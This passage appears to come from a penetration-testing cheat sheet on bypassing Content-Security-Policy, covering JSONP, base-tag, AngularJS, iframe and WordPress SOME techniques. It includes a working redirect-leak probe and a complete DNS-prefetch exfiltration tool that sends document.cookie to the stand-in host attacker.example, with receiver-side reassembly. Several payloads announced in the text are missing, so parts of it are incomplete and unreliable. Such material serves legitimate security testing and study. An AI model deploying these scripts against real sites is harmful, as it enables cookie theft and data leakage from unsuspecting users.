`Content-Security-Policy-Report-Only`: this header blocks nothing; it only sends violation reports (use it in a pre-production environment to test a policy before enforcing it).
When `script-src` is set to `'self'` plus a particular whitelisted domain, it can be bypassed using JSONP if that domain exposes a JSONP endpoint. JSONP endpoints reflect an attacker-chosen callback name into a script response served from the allowed origin, which lets an attacker perform XSS. Working payload:
Folder path bypass: if the CSP allows `http://example.com/company/`, you can bypass the folder restriction and execute:
If the page loads a script by a relative path (like `/js/app.js`) with a nonce, you can abuse the `<base>` tag to make it load the script from your own server, achieving XSS. If the vulnerable page is loaded over HTTPS, use an HTTPS URL in the `<base>`. This only works when the policy does not also set `base-uri`, the directive that restricts where `<base>` may point.
The `$event` object in AngularJS simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome there is a special property on the event object called `path`. This property contains an array of the objects through which the event propagated. The last element of that array is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. Note that the non-standard `Event.path` property was removed in Chrome 109, so this particular property is only present in older Chrome builds. The following code demonstrates this:
`'unsafe-inline'` means that you can execute any inline script in the page (so an XSS can execute code directly), and `img-src *` means that the page may load images from any origin (which also gives an injected `<img>` an unrestricted channel to exfiltrate data).
`'unsafe-inline'` with an `<iframe>`: this time you use the XSS to make the victim load a page you control, and from it make the victim's browser access the page from which you want to extract information (CSRF). You cannot read the content of that page, but if you can somehow influence the time the page needs to load (a timing side channel), you can extract the information you need.
Frame `https://redirectme.domain1.com` and listen for the `securitypolicyviolation` event, whose `blockedURI` property contains the domain of the blocked URI. That is because `https://redirectme.domain1.com` (allowed by the CSP the attacker sets on their own page) redirects to `https://adminsecret321.domain2.com` (blocked by that CSP), so the violation event leaks the redirect target. This makes use of undefined behavior in how redirects inside iframes are handled under CSP; Chrome and Firefox behave differently here.
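The attacker side of this leak, as an added example (not code from the original page): the attacker's page is served with `Content-Security-Policy: frame-src https://redirectme.domain1.com`, frames that URL, and reads the redirect target from the violation event. The hostnames are the ones used above; `leakedHost` and `probeRedirect` are names chosen here. `leakedHost` is kept pure so it can be exercised without a browser; the framing code runs only when a `document` exists.

```javascript
// Added example, not code from the original page: the attacker side of the
// securitypolicyviolation leak. The attacker's page is served with
//   Content-Security-Policy: frame-src https://redirectme.domain1.com
// so the allowed URL loads, the redirect to the admin host is blocked, and the
// violation event hands over the blocked host. Hostnames are the page's own;
// the function names are chosen here.

const ALLOWED_FRAME_HOST = 'redirectme.domain1.com';

// Pull the leaked redirect target out of a violation event. Returns null for
// events that are not a frame block of a host other than the allowed one.
function leakedHost(ev) {
  const directive = ev.effectiveDirective || ev.violatedDirective || '';
  if (!/^(frame-src|child-src|default-src)$/.test(directive)) return null;
  let host;
  try {
    host = new URL(ev.blockedURI).hostname;   // blockedURI may also be 'inline', 'eval' or ''
  } catch {
    return null;
  }
  return host && host !== ALLOWED_FRAME_HOST ? host : null;
}

// Browser entry point: frame the allowed URL, wait for the violation event and
// resolve with the leaked host (null on timeout, i.e. no redirect or no block).
function probeRedirect(doc, url, timeoutMs = 5000) {
  return new Promise((resolve) => {
    const frame = doc.createElement('iframe');
    const finish = (result) => {
      clearTimeout(timer);
      doc.removeEventListener('securitypolicyviolation', onViolation);
      frame.remove();
      resolve(result);
    };
    const onViolation = (ev) => {
      const host = leakedHost(ev);
      if (host) finish(host);
    };
    const timer = setTimeout(() => finish(null), timeoutMs);
    doc.addEventListener('securitypolicyviolation', onViolation);
    frame.src = url;
    doc.body.appendChild(frame);
  });
}

if (typeof document !== 'undefined') {
  probeRedirect(document, 'https://' + ALLOWED_FRAME_HOST + '/').then((host) => {
    console.log(host ? 'redirect target: ' + host : 'no redirect leaked');
  });
}
```

Because the browsers disagree on when the violation fires for a blocked redirect inside a frame, run the probe in both Chrome and Firefox when assessing a target; a timeout only tells you that this particular browser did not report the redirect, not that there is none.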
You can then use the `opener` object in the payload to access the DOM of the page that opened the window and abuse the real endpoint from there. For more information check:
For example, WordPress exposes the JSONP endpoint `/wp-json/wp/v2/users/1?_jsonp=data`, which reflects the `_jsonp` callback name into the output (with the limitation that only letters, digits, underscores and dots are accepted).
`<script src="/wp-json/wp/v2/users/1?_jsonp=some_attack"></script>`: note that this script will be loaded because it is allowed by `'self'`. Moreover, because WordPress is installed, an attacker might abuse a SOME (Same Origin Method Execution) attack through the vulnerable callback endpoint that bypasses the CSP to give more privileges to a user, install a new plugin, and so on. For more information about how to perform this attack check https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/
`<link rel="dns-prefetch" href="//something.com">`

(The `//` prefix makes the href scheme-relative; a bare `something.com` would resolve relative to the current page and prefetch the page's own host.) The DNS lookup this triggers is not covered by the `connect-src` directive of the CSP, so data encoded in the hostname leaves the page even when outbound connections are restricted. A server can close this channel by sending `X-DNS-Prefetch-Control: off`.
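As an added example (not code from the original page), the following JavaScript turns that single link into a working exfiltration channel: it hex-encodes the data, splits it into DNS-safe labels that respect the 63-byte label and 253-byte name limits, emits one `<link rel="dns-prefetch">` per hostname, and includes the receiver-side reassembly you would run over the authoritative server's query log. `attacker.example` is a hypothetical zone and the function names are chosen here.

```javascript
// Added example, not code from the original page: exfiltrating data through
// <link rel="dns-prefetch">, which triggers a DNS lookup the connect-src
// directive does not govern. Data is hex-encoded (DNS labels must be letters,
// digits and hyphens) and split into labels of at most 63 bytes, keeping each
// name at or under 253 bytes. attacker.example is a hypothetical zone whose
// authoritative DNS server logs the queried names.

const ZONE = 'attacker.example';
const MAX_LABEL = 63;
const MAX_NAME = 253;

function toHex(str) {
  return Array.from(new TextEncoder().encode(str), (b) => b.toString(16).padStart(2, '0')).join('');
}

function fromHex(hex) {
  return new TextDecoder().decode(Uint8Array.from(hex.match(/../g) ?? [], (h) => parseInt(h, 16)));
}

// Build the hostnames that together carry `data`. Each name is
// "<seq>.<hexchunk>[.<hexchunk>...].<zone>" so the receiver can restore order
// even though resolvers may query the names out of sequence.
function exfilNames(data, zone = ZONE) {
  const labels = toHex(data).match(new RegExp(`.{1,${MAX_LABEL}}`, 'g')) ?? [];
  const names = [];
  let seq = 0;
  let current = [];
  const flush = () => {
    if (current.length) names.push([String(seq++), ...current, zone].join('.'));
    current = [];
  };
  for (const label of labels) {
    const candidate = [String(seq), ...current, label, zone].join('.');
    if (candidate.length > MAX_NAME) flush();   // a single label always fits after a flush
    current.push(label);
  }
  flush();
  return names;
}

// Receiver side, run over the DNS server's query log: keep names in our zone,
// strip the zone, sort by the sequence label, concatenate the hex and decode.
function reassemble(names, zone = ZONE) {
  const suffix = '.' + zone;
  const hex = names
    .filter((n) => n.endsWith(suffix))
    .map((n) => n.slice(0, -suffix.length).split('.'))
    .sort((a, b) => Number(a[0]) - Number(b[0]))
    .map((labels) => labels.slice(1).join(''))
    .join('');
  return fromHex(hex);
}

// Browser side: one <link rel="dns-prefetch"> per name. The "//host" form makes
// the browser resolve the name without issuing any HTTP request, so neither
// connect-src nor img-src is consulted.
function inject(doc, data) {
  for (const name of exfilNames(data)) {
    const link = doc.createElement('link');
    link.rel = 'dns-prefetch';
    link.href = '//' + name;
    doc.head.appendChild(link);
  }
}

if (typeof document !== 'undefined') inject(document, document.cookie);
```

On the receiving end you need a zone you control with the authoritative server's query log (or a packet capture on port 53); recursive resolvers cache answers, so each name is only observed once, which is why the sequence label is part of the name rather than a query parameter.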
CSP injection in Edge: if an attacker can inject `;_` into the policy, Edge (the legacy EdgeHTML-based version at the time of this finding) would drop the entire policy. Example: http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E